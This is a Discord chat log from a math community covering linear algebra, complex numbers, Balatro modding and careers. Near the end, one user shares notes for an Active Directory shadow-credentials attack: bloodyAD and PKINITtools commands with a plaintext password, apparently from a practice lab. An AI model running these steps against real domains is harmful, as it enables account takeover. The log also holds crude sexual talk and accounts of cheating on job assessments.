#serious-discussion
1 messages · Page 307 of 1
all good :]
I feel so weird not just being able to follow th questions but maybe even attempt a proof of some of these now
@faint elk
Heyy everyone, I am new here to Discord.
hi im new im akira
I’m gonna have to self study most of linear algebra
What’re the best resources online
I got Kunze's book, I am using that for self teaching
Hey can y'all add me, ..into friends list
no, we have discord servers so we dont have to add people to interact
Linear algebra done right by Axler is free online and is a pretty standard book
There’s also loads of stuff on MIT OCW
I personally prefer Hoffman Kunze as a book, but LADR is popular
$\sum_{n=0}^{y}{n \choose x} = \binom {y+1}{x+1} - \frac{\sin(\pi(x+1))}{\pi(x+1)}$
Yeatte
isnt the second term on the right hand side zero?
that's for when the n = 0 starts at x apparently orsmthn
,w hockey stick equation
and hockey stick identity is only for naturals
$\sum_{n=x}^{y}{\binom{n}{x}}=\binom{y+1}{x+1}$ for $x,y \in \mathbb{N}$ where $y\ge x$
whereas mine works for all numbers x, and naturals y
Yeatte
$\sum_{n=0}^{y}{n \choose x} = \binom {y+1}{x+1} - \frac{\sin(\pi(x+1))}{\pi(x+1)}$ for $x\in \mathbb{R},y\in\mathbb{N}$
Yeatte
Apologies for the question, but is the (n x) supposed to be a matrix, if not then what is it?
$\binom{n}{x} = \frac{n!}{(n-x)!x!}$
Yeatte
$(x+1)^2 = \binom{2}{0}x^21^0+\binom{2}{1}x^11^1+\binom{2}{2}x^01^2=x^2+2x+1$
Yeatte
yes
Ahhhh got it, so it's the sum of ⁿCx with limit of n from 0 to y
And what is this, is it a proved formula?
Yes
u can show that with the pascal relation
And u have a telescopic sum which gives the wanted result
Alright thank you, finally what's its name?
Of what ?
The formula
The equality ?
Yeah basically
This
Theres no name for that
Alright Thank you
well
the most similar one I could find is the hockey stick identity
which is a actually a special case of using this formula
oh u prob talking about binomial oop
Welcome to the server @lofty forge
U know Jay uso
i keep forgetting 19 is prime
Hey, can we be friends?
yeet back to his original 
I try my best. 

🫶
Thanks mate
this book im reading introduces complex numbers like this:
- a complex number is a pair of real numbers (a, b)
- they add like (a, b) + (c, d) = (a + c, b + d)
- they multiply like (a, b) (c, d) = (ac - bd, ad + bc)
- (a, b) is more commonly written a + jb
- (a, 0) and (0, b) can be written a and jb respectively
- a consequence of (5) and (3) is that j j = j² = -1
that’s… a rather terse way to introduce them
A bit more complicated but yeah, more informative than the way they taught us here
They simply told us complex numbers are represented as a + ib, where a is the real part and ib is the imaginary part, and that i is sqrt(-1), some basic formulas and that's all, your introduction were some very basic questions or examples in our books
it then goes on to say that the consequences of (2), (3) and (6) are that complex numbers, when written in rectangular form, can just be distributed like in normal agebra and that another consequence of (6) is that 1/j = j/jj = j/-1 = -j
im just wondering if they had a reason for introducing them like this
and not by defining j = sqrt(-1)
They kinda did that in the 6th step, but yeah, maybe it's a more theoretical book, because the approach at introduction is relatively complicated, unless it's an advanced book and they know that you know all this stuff already
i mean they kinda do expect u to know all of this already, this is in the appendix
basically right after showing 1/j = -j, they go on to say
exp(x) = 1 + x + x²/2! + x³/3! + ...
so
exp(jx) = 1 + jx + (jx)²/2! + (jx)³/3! + ...
= (1 - x²/2! + ...) + j(x - x³/3! + ...)
= cos(x) + j sin(x)
so a complex number z can be written in the form |z| exp(jθ), called the polar form, where |z| is called the modulus and θ the argument
Euler's identity after that?
yeah
Yeah yeah this
If it's the appendix then maybe it's not as detailed, the chapter ought to have a slower approach
there is no chapter just on complex numbers lol in the actual content it just says "for a refresher on complex numbers, see the appendix"
i just think its just funny how they decided to introduce complex arithmetic
not by j = sqrt(-1)
but starting with the multiplication rules then ending up with jj = -1
This is kinda sus is the issue
right cuz (-j)² is also -1
You have to be careful about just pretending you have solutions to equations
Yeah, IDK why they complicated it so much unnecessarily
Imagine trying to add a k such that e^k = 0, for example
yea
idk what conclusions that would lead u to
but i assume it would be chaotic and not nice
Personally i prefer introducing the complex numbers geometrically
hello guys in gaussian elimination, when do i know when to start using back subti
Yeah IG, I prefer algebra but geometrical approach helps visualize it better
when u have a triangular matrix
ngl i rlly like this approach
where u define a complex number as just a pair of real numbers
cuz it avoids the problem of sqrt(x) being multivalued
I discussed the geometric approach here before
Sure but i think the multiplication rule ends up feeling pretty unmotivated
triangular matrix in lower part? like staircase of 1 with zeros below it?
well yes ofc :p
upper triangular matrix to be more precise
Yeah it's like chess, there are multiple decent lines but it depends on which one you prefer, one might be boring but straightforward and the other might be exciting but complicated
the last line will be
[0 0 .... 0 0 n] [x] = [y]
corresponding to nx = y, x = y/n
then u can just backsubstitute
oh so like in the last row it has 0 0 0 0 0 and above it are 0 and 1?
elegant
no
what
:)
😭
just look up upper triangular matrix
u might have guessed by the usage of j instead of i but this is an engineering book
so tbh i think the author just wanted to introduce complex numbers as fast as possible
oh just like that
yeah if you’re going for speed, this is the most efficient way
not really the best for understanding, of course
last question, do i need to care about non zeros that is not 1, above the upped triangular matrix?
upper triangular matrix means everything below the diagonal is 0
the upper half of the matrix (including the diagonal) can be whatever u want
the diagonal doesnt even have to be 1s
oh, when that happend i can use back subti now?
yes
.
i understand now
@junior veldt ngl i rlly rlly dont like the idea of defining j as sqrt(-1)
because well u cant use the idea of the principal square root until u have eulers formula
hmm.. it is nice
but idk if it is gonna be easy to teach people to think of numbers as.. things that do things
instead of just.. things
Well it need not be mutually exclusive
They’re simply different perspectives you can take on numbers
and also the motivation for "what if we wanted a number that turns the real line 90°" is kinda sus
yes ofc
Ah sure, that’s kind of a separate thing to what my explanation was trying to achieve
This falls under motivating the equation x^2 = -1 in the first place
yeah
how do we motivate i
without just saying "what if i wanted a sqrt(-1)"
or resorting to solutions of certain cubics
You can talk about cyclic processes
But i do definitely see your point
-# i wonder if one could show geometrically that multiplying by -1 has the same effect as a 180 degree rotation, and then get people to think “what if multiplication in general could correspond to rotation”
A exp(cx) is the only function where the derivative is a multiple of itself (i.e. f'(x) = c f(x)) (this is easy to show)
take the function
f(x) = a cos(x) + b sin(x)
then
f'(x) = b cos(x) - a cos(x)
f''(x) = -a cos(x) - b sin(x)
we can see f''(x) = -f'(x), which is a similar property to A exp(cx) mentioned earlier. but the first derivative is dissimilar to the original function. if only there was a c such that
c a = b
c b = -a
(by matching the coefficients of f and f')
then f' = cf and f'' = cf'
from the 2 equations we can see that
c² b = - c a = - b
-> c² = -1
if this c were to exist, then if we set a = 1
c a = b = c
c b = c² = - a = -1
which is consistent with the c² = -1 we derived earlier
hence if this c were to exist,
cos(x) + c sin(x) = A exp(cx)
idk lol
saying c² = -1 just comes back to c = sqrt(-1)
hmm
In that case, x^2 = -1 would be a byproduct, not the motivation
-1 isn't 180 degrees, it's 360
i is 180 degrees
?
I mean just look at quaternions
-1 if you look at it plainly, is a point reflection through the origin. This doesn't have a square root in many spaces
And its flat out not true that rotating 90 degrees twice in any plane of R^3 is a point reflection the way it is in R^2
Yet ijk=-1
Ergo -1 is not a point reflection
i have no clue what you're talking about
The consistent view says -1 is a 360 degree rotation, spinor style
i,j,k are 180 degree rotations in their respective planes
i wasn't talking about quaternions
Nope you were talking about geometrically motivating i and -1 right?
Geometry done properly won't depend on dimension
I don’t really care what you think “proper” geometry is
It’s very standard to visualise i as a 90 degree rotation
Works in R^n
It's also standard to be wrong and confused about many things
It's also standard to use the cross product for planes in R^3, doesn't make it right
ok you're just being weird and cringe
talk to someone else about your personal model of geometry, i'm not interested
i said, i'm not interested
Anytime you step out of R^2 in fact
Cool?
What does this mean to me
I was done talking about it
then stop talking about it
You know, I don't think I will
Hello pseudo
hi...
What happened...
dealing with some geometry crank idk
Homie is hostile for no reason
Wraith is a crank now 
I'm showering before I begin yapping
Now??
Man I fell off
you know this person?
Yes I'm prolific
Yes 
All I did was say it's misguided to justify -1 being a 180 degree rotation, because it generally just is not
wraith definitely knows math just highly geometric pilled
doesn't sound particularly geometric to me
Geometric in the sense of geometric algebra
Well if you work out the formula for reflections across hyperplanes you end up with (unit) vectors double covering reflections, an anti-commutativity rule, and a sandwich product
Which coalesce in (-1)x(-1)=x
geometric algebra people are often like this
ime
so ig geometry crank was accurate then
In my opinion
Apparently the wider opinion of whether or not I'm a crank shifts from time to time
do not call me that
Are you the one who objected to being called homie yesterday
What is the issue with the label I thought it was one everybody could agree with
Is it just "I'm not your homie" shit
clearly not
Which message is that responding to
.
What's the problem with it?
i don’t want you to call me that, is all
Alright pobleromie
tf is that
It's a gibberish word I started calling certain friends and people after discovering "Polvorones"
Some shortbread orange cookies
I assume Mexican or some south/central American brand, they stock it in the international aisle
Love em with coffee
look “homie” and its homophones just feel too masculine for me
this is why i asked you to not call me that
So is pobleromie also no good
yes
I specifically chose homie cus it felt gender neutral to me lmfao okay
I'll just call you Pseudo for now but I still need a solution for the general case
Unless I just call everyone "Pseuds"
Done
do you have any actual interesting maths to share
Do you mean at this particular moment? No, I need to get back to attempting to classify the pythagorean metric vectorspaces so I can do GA
ok then bye
Bye pseuds

Lovely struggles continue
If I were to threadpost about this, which topic channel would I occupy
Such a simultaneously broad and specific trail feels out of place in like, linear algebra
u said pythagorean, so I would usggest #geometry-and-trigonometry in pre uni 
~~or #advanced-algebra ~~
HAHAHA
I think that might be the place
~~ or #help-4 ~~
I know it's "just arithmetics" but finding 4 unknowns with 6 equations is such a pain in the ass
I hope this won't come out in the exam. Newtonian mechanics
Newton is amazing
I don't wanna have to do this with time pressure
It's not even the whole thing
it's just the first part of analysing the structure
overdetermined system?
Not even that
2 fixed bearings and 1 Momentengelenk, googling what it is in English...
oh, hinge, that's easy
Hi
Hello
Hi
I recently joined this server
Okay. Welcome. How are you?
Nigeria
Oh cool.
Yeah
So what season is going on there?
It's the rainy season
Right now it's even raining
Same here.
Where are you from
India
Wow that's so cool
How is it like in India
Wait are you a girl or a boy
It's raining and even some catastrophe is going on in some places.
I'm a boy.
That's nice
Rainy season, flood somewhere. Cloud burst on mountains. Etc
Okay.
Same here
👍
Sry for late response
So.... Should I call you AHit
Would you like to chat personally than on the server
Very much
But why?
Ok thanks
Is there any concern?
Idk I thought you would prefer it
No not really
Naw, you can ping me here, whenever you want.
How is school like in India
Ok thanks AHit
All good. There is much pressure on studying here.
Wow I love studying
Same here also
What are you studying?
I am 13 years old and I am in secondary school
U will have to be in university before you will decide what to study here
I love math
What are you studying
I'm doing graduation in maths
Wow that's awesome
Keep it up.
Yup
Thanks
So u are in university
Definitely.
Wait hope there isn't any problem asking how old u are
23
Good night.
congratulations on your graduation AHit
Good night it's was nice chatting with you
Chat a HUGE opportunity opened up for me
enjoy your canned spinach
lol
An emeritus invited me to present and defend my research the EE PhD committee
I heard
India seems like it sucks for students - same with china, korea, etc.
the competition is insane
w
hello
Welcome to the server @green crown
thank you, looks great!
Hello, is there any way to download the Lean programming language on Debian/Ubuntu with a package manager? I'm having trouble figuring out what to do to actually set up a file. Does one just have a text file and run it?
holy shit a linux user
thats a good question actually but if u have vscode installed u could use elan
install it using apt or sudo
Can cnfm, thats how I do it in fedora
Hello!
hai
Just wanted to say that I love math so much but sometimes it gets really confusing I want to study more but it overwhelms me 😭😭😭
same lmao
Yes
💔
yo chat does eating onion help with hair?
I'm 18 rn and facing hairfall issues
gonna go to a dermatalogist this weekend
I'm eating like 1 onion per day
I'm older and also getting hair loss.
how old are you unc 🥀
29, and I consume onion every day but cooked.
I like to eat it raw
like in form of salad
with cucumbers as well
bro where were you??
I like the onion too. But not for hair loss.
does it improve in hair though?
cloner?
I also like to eat it just for the taste
clone??
not the sould purpose of hair
CLONE?!
I don't, hair loss can be any reason. I heard that one place every person was getting hair loss and they were eating some foods with heavy metals.
💀
Don't spam
well what do you think is the reason for your hair loss?
stress?
family?
woman
Could be any, stress, modern life style, water, food.
@blissful basin you're getting spam filtered because you're flooding chat otherwise. It happens automatically via discord.
Yeah this too count as stress
depend
I had one crazy expernice with a girl here in India
Please count genetics too.
did she make you lose hair or
nah bro what did you experience?
I guess 🥀 we both were 18 and I lost my virginity to this girl, and suddenly she told her family about it and her family wanted me to marry her 💀 , when I refused, she filed a case on me that I 🍇 her
💔
man..
"this site can't be reached"
why not marry her, she ugly?
Got clean chit?
dude I'm still 18, 😭 I can't even legally marry here before 21
This channel doesn't support media (gifs).
i know india marry is expensive
we no role
had to bribe that bitch
it's not about the price as well, my background is privileged not to brag, but I just don't wanna marry rn
the laws here gynocentric af
well it sounds ridiculous but in the eyes of indian law "I 🍇 her"
Yeah. Here boys can't get 🍇 ed
in russia, you have prove together and above 18, no one can send you to court
no bitch can scam you
Laws need to be gender neutral. Crimial is crimal
Where are you from by the way?
so no sleep until marry then
no kiss too
Just sleep before marrying and don't sleep after marriage.
but how make child after
no sense
Your sleep means different, mine different. I get your point.
crazy planet we live in
Let's go for mars.
soon
A good alien girl is waiting.
man.. we already have alien girl if you know 😉
Predator is all about this?
i no get it
So you're married?
i have girlfriend
Okay.
india
you india too? @tropic pivot
Can I try on girls there?(Asking genuinely)
Friends.
russia friends?
bro our image is already bad 😭
Yup
my girl and me together from highschool, now in university
they want?
What can I do? I don't even make friends here. Do you think i can friend a foreigner. I'm talking to you just because it is chat.
man i want to ask
yeah apparently from the prostitution of russian women here
how big is highschool class in india
I didn't ask that way.
no like population, we are 25-30
uhh depends
it could be 50-60
or 20-30 as well
ah good
Depends on money. We have high class schools and some good but infrastructure less schools too.
the older I got, the less people were in my class
lol
india competition for university is hard
Yeah. Money is money.
And school doesn't help it to achieve.
too many take exam
yeah but they still trash compared to US universities
also the caste system is also fucked up here💔
is engineer not good?
Yeah they spent much more money on research and innovation.
I could have gotten into a good college
this year
but I'm taking a year
to prepare again for the exams
they corrupt
Where ?
:/
NIT
Delhi?
I had 92 percentile this year
I'm taking a drop year
100 percentile in maths
my chemistry was weak
Oh.
for what diploma
engineering
ah good
that's like the default profession 😂
didn't really have a choice to explore other fields
lol
In what field you are trying? Like cs, civil?
No IIT?
not interested in programming
couldn't qualify mains cuz I'm from general category
Best of luck for the next one pal.
thanks
big population is big competition
Less population is also big problem. Russia, japan china population is on decline i heard.
How old you're by the way?
i 21
What are you studying?
demn I might be the youngest lol
That doesn't make me intelligent
Cool. In what language do they teach you?
russian
✌️
you can come but you need year to prepare to get russian
Are there different versions of russian in different localities?
Are russian people good to foreigners?
explain i no get it
for me, i have no problem, international students many here
Meaning you speak the same russian all over the country or are there different versions?
russia have different languages in different regions
Okay.
They give one year along with academic or you just first learn russian and then start academics?
Cool
you take one year to prepare then after you start university
you take exam
Okay. Do you have a scholarship?
what means
Govt. Provide financial help to brilliant students.
i think i got it, we have space allocated for people at budget is what is called and people at tax who pay, i at budget
if you study good you can make one year at budget from tax if you want
That's good.
you not allowed to make 2 university at budget, is one time
That will be fraud
you can make another university but you pay tax
you can make 2 university parallel at same time but one you pay tax
Okay
See you later.
good luck
They are kinder inside than youd expect
Okay. You gave your opinion as native or foreigner?
Foreigner
I was there for a trip
Yeah
what you visit in moscow
Shake shack burger
ok…
Is math a science?
you not have in you country or business visit?
you visit red square?
Yeah I did
or gorky
gorky no
i not know name in english of some
Hi
If mathematics were not considered a science, the other sciences would not function.
For example physics without maths would not fuction
Mathematics would remain as useful if we called it a science or a top hat. Giving it a different name doesn't change how useful it is.
i'd rather have a BSc over a BTopHat
The employment prospects certainly would sound more encouraging
Shakespeare talks about this in Romeo and Juliet
whats good chat 👅
I was gonna quote it but I felt like that would be too 🤓 ygm
herbal soup
I should read Umberto Ecco's The Name of the Rose
hello
Hi
does number have correlation with biology acceleration and dreaming ability of seeing natural geometry shape of diagnal
The old man the boat
Hi
hello
Hey
hello
Hi
what you want
fat people eat accumulates
@obtuse grail you could ask hru or talk about math or something or they might think you're spamming
silksong sept 4
No they're not, they just sent me hi 7 tumes in dm
Are they spamming your DMs?
Nothing just chatting
but say hi many times
Oh I am not spamming I joined this server because I love math and not to spam people
Ok how many times did I say it
3
Oh yeah sorry I noticed nobody answered or because my message was not delivered that's why
ok
Oh okay no problem 
Yeah thanks for understanding
Should I introduce myself and u also introduce yourself
Yeah okay
But I know everything already 
Ok how did you know
Ok I see where am I from
Nigeria
Ok good
¯_(ツ)_/¯
U are on #discussion right
Yup
I'd rather not doxx myself 
What do u mean
I am not a bad person and I am not spamming u
Yeah but like I'd rather not here
the constant splendos 😭

hi
hmm
not too much I was just kinda juggling multiple things
hbu
I'm up to so little, it's wild
really?
I got out of my apartment at least, which is nice
I've been too shut innnn
What are you juggling??
ugh I felt that
I was trying to decode a person, process feelings, do some math with tensors/vectors/partial derivatives
Oh, those are all potentially very tricky
Ahh
tbh sort of same except i leave my house for exercise but not much else
whats line dancing
what is the project about?
I love ur pfp
thank you it was take last year inside zoo.
It's such a good lizard
i dont know its species but looks like gecko?
it seems really good
I believe it might be aswell
I'm really glad this isn't one of those things where someone throws out a half baked idea with no actual rigor. This was incredibly refreshing to see.
if you want i can share?
sure
i will dm you soon
alr
is that trade doing startup?
the word are so professional that i didn't understand it at all.
Compute is definitely one of the biggest hurdles I see when someone is working with AI (mainly because my parents are software engineers/computer programmers). I don't have much expertise in that area, as I am more focused on physics.
This, regardless, is impressive and could stay in use for a long time. The only issue otherwise would be adapting to competition in later years.
cool
done
Taking a look at it, it doesn't look like an iguana. I'm unsure exactly of what species it is, but it might come from the iguana family.
could just be the angle though
I don't have formal training I more so just do some on the side. Edwin Jaynes was a very interesting person I must say.
I think my favorite person was Tesla. An incredibly smart man.
Humble, too.
ooh those are very good choices
de moivre has probably been the most interesting in terms of adding to part of the foundation of mathematics.
We tend to take the little things for granted.
Interesting. I don't think I've heard of John Graunt before. I may take a deeper look into his work.
you guys are intellectual person.
Huh?
are you a quant or smth per chance
So smart and good
oooohh
when you say you studied it do you mean as a course?
oh i didnt know that
was even a course in Uni
is doing a math degree straight into quant better than like an ML course like you did?
im like applying to uni in less than a year
The clinching argument
I wasn't convinced until I read that her response was in fact balanced, realistic and resource-backed
i defo do wanna be a quant thats why i asked
I don't think I'm that far in my academic journey just gonna write my A levels
No uhh I know what ml and quant is to an extent
So like in your opinion seeing in your bio that you have a PhD and msc in math would you say programming or coding is wayy more valuable for a trader
you need to be decent in coding if you wanna be a trader
Got that but I'm talking abt the relative importantce
Between math and programming
Hi
ive FINALLY unlocked all decks (?) @quick beacon @faint light @gusty socket
yippeee
nice 
did it with ghost deck
god that deck is so fun
couldve probably done it much faster with checkered or plasma but mama didnt raise no bitch
Safe to say that ghost is your favourite?
I actually really like anagraph and painted the most probably
painted just lowers the mental load, moves it away from hunting for a hand and to more strategizing I feel
anagraph is just epic I love building like 6 double tags and then getting a billion worthless negatives that make it so that I can't see my jokers lmaooo
My winrate weridly is way higher on anaglyph, Idk why exactly
it's definitely less powerful on gold stake, in theory, than a lot of other decks
but I think the fact that it's restricted early on makes me play better lol
@reef carbon is also into balatro i think
oh it's analglyph not graph lol
yeah my win rate is low mainly I think because I suck but secondarily I think because I see a fun joker combo idea early and then send it even if it's bad
turns out all chips orange stake on not plasma deck is hard
I also fuck up Obelisk and ride the bus like every time
Yes plasma deck is actually hard on the higher stakes, it's so inconsistent grr
I got Obelisk up to like 10x by playing lots of highcsrd early and then accidentally played too many pairs just spamming hands building green joker
I wish it could just not score a hand that would break the streak or pop up a warning at least lmao
yes that i am
lets fucking go
I'm fucking itching for the 2025 update
I stay awake at night thinking about it....
Not really
oh what's that?
what update 
Localthunk promised an update in 2025
it has not come out yet
There has been little to no info about it
that's about the summary lol
yooo! grats!
I really should work on C+ instead of futzing around with modding.
but modding balatro is so fun
oh have you finished any mods?
what lang is it
there's a few QoL changes I want that idk if mods exist for
like the castle joker really ought to have the icon of the suit for that round on the card I feel
it's all in lua, and actually there's a pretty decent mod manager https://github.com/skyline69/balatro-mod-manager
It's not... perfect. But it's decent and it's easy
If you're interested in gameplay mods I think the pokemon mod is pretty good
I'm probably just into minor changes mods for now
oh no
vanilla+ type things
A Vanilla inspired Balatro mod, implementing ideas on the Official Balatro Discord - OmnipotentEntity/DiscordVanilla
😭
That's the mod I'm working on, it's just random stuff other people suggest.
😿
neat! is it modular or planned to be at all?
It is planned to be modular, but I need to actually do the UI for that.
It's currently very modular in code.
very nice
the latest update news i heard was the blue deck rebalance
was any other update announced?
A 2025 gameplay update was announced a LONG time ago
like in 2024
As for the actual content of the update, Thunk has been quite quiet about it
He decided not to rebalance blue seals, apparently
And there will be new jokers. That's all we know really.
That makes sense then
Uh huh
I'm not rlly sure and this might be like a autistic question
But like wouldn't a math degree be more ideal if you wanted all that?
Oh nah in not talking bout pure math
I'm talking about applird
Applied*
On a relative scale applied math is less ideal then?
For quants
How important is pre calc for ap calc ab? Like how much of pre calc is actually used in calc
Alright last question I won't bug you anymore how many years did it take to get your qualifications your PhD and msc?
Oh
That tradeoff doesn't seem worth it
The ROI
Of like
7 years worth of money and effort poured in
That's me thou
I thoguth you wanted quant
Jeez
You used to work at NASA?
You might be way more qualified than anyone I've ever met will be
Definitely
That's why I didn't go for my passion for physics and chem
I wanted aerospace engineerring
My god your like the biggest tryhard I've met
Nasa
And quant
oh they arent a private comp?
ohh no industry? like at all
deadass your like my inspiration bruh
NASA and a quant
i mean NASA is a big name
in the industry
its rlly competetive
Saving
i would say this might be too inspiring
I wanna create just a simple model that detects wether a human is presented on an image or not
I just wanna ask
I don’t have any machine learning experience
I have coded
In python but never touched this side
I see online there’s many ways to approach this
If you were in my boat what would you do to start and make it as soon as possible
Of course the model doesn’t need to be even close to perfect
Oh actually I wanted to make it to learn more about it 😭
I don’t need the tool itself
I understand that much
Even something small
And simple
Is cooked
What would that do
Just use some other model somebody else made
Nah I don’t need
The actual detector
It doesn’t matter
I just wanna have some experience
In training and making models
Most people gotta do it anyway right ?
What would that be like
Oh yes
Like
Would it be feasible
Like within 3 years time
Easily
Nah I was gonna say like
Without any supporting sin
Ai full scratch
You start off with ML -> DL -> CV i guess
Learn how to make something like a detector for people
Like can look and detect different faces
Is that something not that complicated as I think it is
Oh really
There's a youtube playlist from Harvard/stanford where they do that but you always end up using some library it's never "truly from scratch" ever
I have a question
Like I know this is really different
But something like what openai made
What’s the actual difference
Is it just amount of neural pathway stuff
Or is it something entirely different
Like what is the difference
Is it complexity or is it arranged differently
People in the software industry are implementing all of this and don't know the math behind back propagation 💀
Like chatgpt vs a image sorter
So like
GPT-5 is the greatest mathematician created
Yawn
...
Honestly
3b1b explains it the best
Though it's a little more on the math side
Yeah he's amazing
But sometimes it goes over your head if you don't have the pre requisites
I never really got to understand the intuition behind Fourier and Laplace transforms
But i skipped it cause it wasn't that imp for our subjects
SUREEE
Sounds really cool but getting your hands on sensitive/company data is hard?
Also, I was hoping for a GitHub repo 😭
But yeah the idea is awesome, is this your final year project?
No
If I wanted to learn programming for quant fin what websites would be good and like any other tips?
actually kinda yeah personally.
yep
hi discussy 2
Incomprehensibility is rooted deeply in mathematical tradition
yep
is there anyway someone could provide a linear or exponetial function turning morphing into a normal curve
Very interesting. What's the market here - as in what type of a financial firm would buy an external provider's execution algorithm for them to deploy themselves?
I have the following example i made in my notes but for some reason it always sends back a failed check with bloody-ad when adding shadowCert idk what im doing wrong pls help
bloodyAD --host '10.10.11.69' -d 'dc01.example.local' -u 'p.agila' -p 'prometheusx-303' add groupMember 'SERVICE ACCOUNTS' p.agila
generating certi and adding to said group:
bloodyAD --host '10.129.147.223' -d 'dc01.example.local' -u 'p.agila' -p 'prometheusx-303' add shadowCredentials WINRM_SVC
then to say the ticket in ccache:
python3 PKINITtools/gettgtpkinit.py -cert-pem ik5LDalb_cert.pem -key-pem ik5LDalb_priv.pem -dc-ip 10.129.147.223 example.local/WINRM_SVC winrm_svc.ccache
once ticket is in ccache klist, i tried to set environment variable but instead i guess i could just use the ticket to generate a NT hash:
python3 PKINITtools/getnthash.py -key 6e859bbc88c2b9bc5cfd3254cb9c439f7120d61442b485b9964c0e51c14aa622 example.local/WINRM_SVC
my output is always can not find shadowCert? but i checked my bloodhound and it's definitely connected to the user and the group is using it to authenticate but why is the hash invalid? it literally generates it???
I would think that the guys who'd potentially deploy it already have teams developing similar things in-house (and I think wouldn't and couldn't deploy an external black box) and the people who need execution services are the clients of the former group and probably have no interest in deploying anything sophisticated themselves.
I'm not disputing the novelty of the algorithm, it sounds really cool. I'm just trying to understand what the business case for buying it would be. The clients would presumably be firms that offer execution services, so I guess largely banks?
Have they ever bought an externally developed algorithm?
Jane St have bought up smaller firms? I mean it makes sense, but I don't remember ever seeing it in the news - do you have an example?
Individual people get poached between financial firms all the time, sure, but I think entire buyouts don't happen that often and do make headlines. Anyway, so is the idea of developing the algorithm to get hired by one of the firms or is it to make it a business of selling it to all?
But the business model of say Citadel is very different from Jane St
The Citadel buyouts that I'm aware of are less to do with buying up algorithms, but buying up positions and in effect client lists. So the business model is very relevant here.
could u use block code next time? it's hard to read ur issue here
``` py
ur thing goes here
```
Hey
Hi
hi
hru
hru
@mossy ridge welcome to the mathcord! 
can i show someone my face in a videocall i wanna know how old i look
is fine if not minor
Does anyone know any mathematical logic study group?
Anyone wanna tell me a little about ring theory?
Broadly speaking, it is about understanding properties of number groups, and the integers may be generalized to other "system", such as Gaussian integers Z(i), which are integers in the form a + b i, where a and be are integers.
Interesting
ring theory is more general than number rings, but certainly, that’s the historical origin
Our users certanly doesn't look alike
c
this isnt related to math but
im making a roblox game based off the uhh
alan or someone
Almost nothing in discussion channels is
alan's math vs animation of something
ok
anyways what should i name the game
not really for fighting since that would take too much coding
Whats the game specifically about?
uh
messing around with math "physically"
to be more speecific
ok idk but
go see the video and youll get the idea
Physics playground?
ok so its like
a game where dividing by zero and sending people in the "sky" is also included in what you can do in the game
Perhaps a suitable name?
wait
sincei ts math
and you said physics playgrond
uh
what about "mathysics playground"
do you think thats a decent name
Eeh its a bit unorthodox
You think so? I think its a bit too abstract
i need to learn calc 1 and vectors in 1 week, i need help
Can anyone give me advice for college I’m starting in September
you should flex those brain muiscles by solving a bunch of math riddles
here's one: #computing-software message
Hey everyone,aspiring mathematician/researcher here. My goal is to eventually work on original research. Beyond the standard undergrad curriculum (Calc, Linear Algebra, ODEs), what are the most important topics I should focus on mastering? Any hidden gems or often-overlooked subjects that are crucial for a strong foundation?
probably get some undergrad research opportunities to see what topics interest you the most
you seem to have missed some of the core undergrad curriculum, like a real analysis course, an abstract algebra course, and a topology course
When do I start feeling that I actually know math with substance and not things that seems to be common knowledge for every toddler
/hj
It will probably take a while, so so many people struggle with imposter syndrome for pretty their entire career
hi nopeydopey!
I can do anything!
major?
Super cool
Its just that I see some peers already knowing some deep stuff, while I am just excited to finally learn the basic of galois theory
Is this for competitive programming
I literally study like a day before exams 😭
How do you
Um study everyday 😭
Dw I get good grades
Btw
This is so me 
Sab you should start doing cf, i just started
It'll be fun
And prob
Help you
Codeforces 😭
Yeah I've heard it's a little math intense but I'd rather do this than leetcode for OAs
Oh you do lc huh
Do you know all the concepts? Or do you like to choose one and do a lot of questions on it
Yeah
Cluely
😭
Btw he's at 6M ARR rn
Which is INSANE
I thought they'd put him behind bars 💀
Especially cause amazon got into it
Ugh
True
They should just do aptitude
To check if you're good i guess
Hey what's going on
Right
Bro in uni literally everyone cheats on OAs and i hate it
The system is rigged 💔
No classes and tests are invigilated I'm talking about online assessments for internships and jobs
More important than classes bte
Your gpa does NOT matter at all you need to be able to solve those lc questions (or cheat your way through)
I just started solving those



